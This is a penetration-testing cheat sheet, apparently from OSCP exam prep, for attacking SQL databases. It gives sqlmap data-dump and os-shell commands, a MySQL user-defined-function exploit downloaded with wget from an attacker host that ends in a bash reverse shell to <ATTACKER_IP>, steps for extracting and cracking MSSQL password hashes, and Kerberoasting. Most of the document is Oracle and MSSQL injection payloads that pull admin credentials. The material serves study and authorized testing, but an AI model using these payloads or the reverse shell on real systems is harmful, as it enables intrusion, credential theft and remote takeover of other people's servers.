All commands listed here assume you have a command prompt on the relevant host (attacker box or target), unless stated otherwise…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

CONNECT TO SQL SERVER

sqsh -S <IP> -U <Username> -P <Password> -D <Database>
mysql -u <user> -p                      (prompts for the password - preferred, keeps it out of shell history)
mysql -u <user> -p<password> -h <host>  (NOTE: no space after -p; "-p password" is parsed as the DATABASE name, not the password)

QUICKLY SAVE A QUERY THROUGH BURPSUITE

…NOTE… sqlmap (and therefore this whole workflow) is not permitted on the OSCP exam; use the manual queries further down instead

http://ip.com/whatever.php?id=1
INTERCEPT WITH BURP - NO FORWARD
RIGHT CLICK AND HIT 'SAVE ITEM'
USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner (takes a while to run)
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometimes it shows more - hex encoding avoids data being mangled by the application)
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10
RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10
TRY A SYSTEM SHELL
sqlmap -r <file> --os-shell --threads 10   (<file> was the saved request, e.g. "mssql"; on MSSQL this needs elevated DB rights - check --is-dba first)
os-shell> whoami

MYSQL ENUMERATION

…requires credentials

mysql --host=127.0.0.1 --port=13306 --user=wp -p
MariaDB [(none)]> SHOW GRANTS;                               -- look for FILE / SUPER; FILE is needed for load_file() and INTO DUMPFILE below
MariaDB [(none)]> SHOW VARIABLES;
MariaDB [(none)]> SHOW VARIABLES LIKE 'plugin_dir';          -- where a UDF .so must land
MariaDB [(none)]> SHOW VARIABLES LIKE 'secure_file_priv';    -- if set (non-empty), file reads/writes are restricted to that directory

MYSQL EXPLOIT

… compiles a shared object, registers it as a MySQL user-defined function, then runs OS commands as the user mysqld runs as - that is root only if the service itself runs as root (check with ps -ef | grep mysqld). Needs the FILE privilege and a writable plugin directory.

# GRAB THE EXPLOIT TO COMPILE
git clone https://github.com/1N3/PrivEsc.git
# NOTE: -m32 builds a 32-bit library; it must match the target mysqld's architecture (uname -m / file $(which mysqld)). Drop -m32 for a 64-bit target.
gcc -m32 -g -c raptor_udf2.c
gcc -m32 -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
ls
lib_mysqludf_sys_0.0.3.tar.gz  raptor_udf2.c  raptor_udf2.o  raptor_udf2.so  raptor_udf.c

# ON TARGET MAKE A DIRECTORY /tmp/tmp
mkdir /tmp/tmp
cd /tmp/tmp
wget http://<ATTACKER_IP>:443/raptor_udf2.so   (the original note had 192.168.119.299, which is not a valid IPv4 address - last octet > 255)
cp raptor_udf2.so raptor.so

mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/tmp/raptor.so'));
Query OK, 1 row affected (0.00 sec)

mysql> -- first confirm the blob actually loaded: select length(line) from foo;  (NULL = FILE privilege missing, secure_file_priv set, or mysqld cannot read /tmp/tmp)
mysql> -- the target path must be MySQL's plugin directory: select @@plugin_dir;  (/usr/lib/ only works on old installs; newer ones use e.g. /usr/lib/mysql/plugin/)
mysql> select * from foo into dumpfile '/usr/lib/raptor.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+-----------+----------+
| name      | ret | dl        | type     |
+-----------+-----+-----------+----------+
| do_system |   2 | raptor.so | function | 
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)

mysql> -- start a listener on the attacker box first (nc -lvnp 80); the shell runs as the mysqld user
mysql> select do_system('bash -i >& /dev/tcp/<ATTACKER_IP>/80 0>&1');

CREDENTIAL LOCATIONS

… may be able to find files with credentials
… here are a couple common ones

# PLAIN TEXT DIRECTORY STRUCTURE
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Template Data\master.mdf
# NOTE: the live database files normally sit under ...\MSSQL\DATA\master.mdf; the "Template Data" / "Binn\Templates" copies are install templates and may not contain the logins you want - check both
# OLDER NT DIRECTORY STRUCTURE (8.3 short names; this form has the backslashes doubled for use inside a quoted/escaped string)
C:\\PROGRA~1\\MICROS~2\\MSSQL1~1.SQL\\MSSQL\\Binn\\Templates\\master.mdf
# SAME OLDER STRUCTURE (unescaped, relative to the drive root)
PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf

# POWERSHELL - RETRIEVE HASHES
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
import-module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\admin\Desktop\master.mdf"
# IF THE FILE IS IN USE, ONLY BACKUPS CAN BE USED FOR THIS
# HASHCAT MODE FOR MSSQL LOGIN HASHES
hashcat -m 1731 <hashes.txt> <wordlist>   (1731 = MSSQL 2012/2014 hashes; SQL 2000 = -m 131, SQL 2005 = -m 132)
# UNRELATED TO MDF FILES - KERBEROASTING (service-account TGS-REP hashes), CREATE HASHCAT READABLE HASH
Invoke-Kerberoast -outputformat hashcat | fl
hashcat -m 13100 <hashes.txt> <wordlist>

SQL INJECTION QUERIES

… these are just a few common ones
here and here and here are more (just google it)

# HAD TO FIND THE NUMBER OF COLUMNS
# FIND WHICH COULD BE USED FOR INJECTION

# ORACLE
# VERSION
admin' or 1=1 union select (select banner from v$version where rownum=1),null,null from dual--
# DB NAME
admin' or 1=1 union select global_name,null,null from global_name--
# TABLE NAME
admin' or 1=1 union select table_name,null,null from all_tables--
# COLUMNS
admin' or 1=1 union select column_name,null,null from all_tab_columns where table_name='user_table'--
# LOOT
# (the three unpadded / unquoted attempts below are kept to show what failed; the corrected version follows each one)
admin' or 1=1 union SELECT username FROM all_users--                                   <- fails: 1 column vs the 3 columns of the original query
admin' or 1=1 union SELECT username,null,null FROM all_users--
admin' or 1=1 union SELECT name FROM sys.user$--                                        <- fails the same way (needs ,null,null padding)
admin' or 1=1 union SELECT column_name FROM all_tab_columns WHERE table_name = WEB_ADMINS--   <- fails: wrong column count AND WEB_ADMINS is an unquoted identifier, not a string
admin' or 1=1 union SELECT column_name,null,null FROM all_tab_columns WHERE table_name = 'WEB_ADMINS'--
admin' or 1=1 union SELECT PASSWORD,null,null FROM WEB_ADMINS--
# USED TWO COLUMNS TO SEE USER / HASH
admin' or 1=1 union SELECT PASSWORD,ADMIN_NAME,null FROM WEB_ADMINS--

# MSSQL - error-based: convert(int, <string>) fails and the error message echoes the string. db_name(N) returns the database with id N, so step N to list databases. archive.information_schema.tables is a cross-database reference; archive..pmanager uses the default schema (dbo)
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

# MONGODB
condition=aaa';shellcode=unescape...
db.my_collection.find({'$where':'shellcode=unescape....
# THIS GOT RIDICULOUS... NEED TO LEARN MORE (NoSQL injection via $where / JavaScript, different class of problem from the SQL ones above)

# MSSQL (RIDICULOUS!) - repeat of the MSSQL block above, plus the direct users-table query
# syntax is [server].[database].[schema].[table]
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(select+top+1+username+from+users)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

SQL INJECTION BASIC STRATEGY EXPLAINED

this is the reference for many of the commands below

# THE ',convert(int,(  )))-- IS USED AS A TEMPLATE... PUT THE QUERY INSIDE THE EMPTY PARENS. The string result cannot be converted to int, so the DB error message leaks it (error-based injection); the + signs are URL-encoded spaces

# FIND DATABASE NAMES
convert(int,db_name())--

# OBTAIN TABLE NAMES
select+top+1+table_name+from+information_schema.tables
',convert(int,(  )))--

# LOOK FOR SECOND TABLE BASE OFF OF PREVIOUS RESULTS
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')
',convert(int,(  )))--

# AND FOR ANOTHER TABLE BASED OFF OF PREVIOUS RESULTS... TILL THERE ARE NO MORE
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')
',convert(int,(  )))--
"RECORD DELETED" (no conversion error) = NO MORE TABLES (the query enumerates information_schema.tables, not databases)

# NEXT TARGET COLUMNS
select+top+1+column_name+from+information_schema.columns+where+table_name='users'
',convert(int,(  )))--

# SECOND COLUMN OF THE TABLE WE FOUND
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')
',convert(int,(  )))--

# CONTINUE UNTIL RECORD HAS BEEN DELETED = LAST COLUMN
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')
',convert(int,(  )))--

# GETTING THE DATA - SAME METHOD USING TABLE AND COLUMN
select+top+1+uname+from+users
',convert(int,(  )))--

# SECOND VALUE AND SO ON
select+top+1+uname+from+users+where+uname+not+in+('admin')
',convert(int,(  )))--

# THIRD VALUE AND SO ON TILL RECORD DELETED = LAST VALUE
select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')
',convert(int,(  )))--